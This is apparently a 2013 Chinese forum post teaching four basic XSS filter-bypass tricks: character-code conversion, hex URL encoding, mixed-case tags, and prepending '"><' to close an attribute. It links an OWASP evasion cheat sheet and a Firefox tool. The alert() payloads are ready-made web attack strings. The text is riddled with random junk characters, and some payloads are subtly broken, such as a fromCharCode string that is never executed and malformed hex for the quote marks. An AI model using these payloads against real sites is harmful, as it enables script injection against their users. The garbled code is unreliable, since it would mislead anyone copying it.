四种超级基础的绕过方法。; _$ [! | a# F0 C( X1 V! _/ h
1.转换为ASCII码
7 h9 x" S" I; c4 t7 s2 Y6 R例子:原脚本为<script>alert(‘I love F4ck’)</script >
0 H( _2 V7 t& y! a- @& C通过转换,变成:9 o% E0 |" y" T# q% q
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>" q+ J" O% c) o5 B" N1 ]4 b
. r& k/ u; \0 K+ n" h
2.转换为HEX(十六进制)$ A) J, W/ _: q f9 H, N
例子:原脚本为<script>alert(‘I love F4ck’)</script>
& {' b6 Y1 z/ G$ k' r8 y通过转换,变成:
/ F' J5 X$ B2 @8 k- G4 x x%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
6 N; d4 R1 ^* ], a6 Z 5 n5 X* N( w, B( o
3.转换脚本的大小写
7 c7 g) r& Z# |* N例子:原脚本为<script>alert(‘I love F4ck’)</script>1 O9 }# O5 s( _4 a) R. N3 L
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>6 N* Z% n6 }6 y7 j
. S8 n% O l$ l' N: n9 ^( G- L
4.增加闭合标记”>( v3 y# y: j1 h3 m8 C
例子:原脚本为<script>alert(‘I love F4ck’)</script>/ U5 E3 N3 |$ ^6 Q$ k* N
转换为:”><script>alert(‘I love F4ck’)</script>
1 K' j: Q! a+ ?/ F5 \1 \5 Z更详细绕过技术请参考此网页
$ M, ~; g2 j3 M! ~8 O( F, zhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet: a& R. ]9 F! z. w; r# f
7 |8 Q3 W O, ~0 M8 G4 ^! O1 ^转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对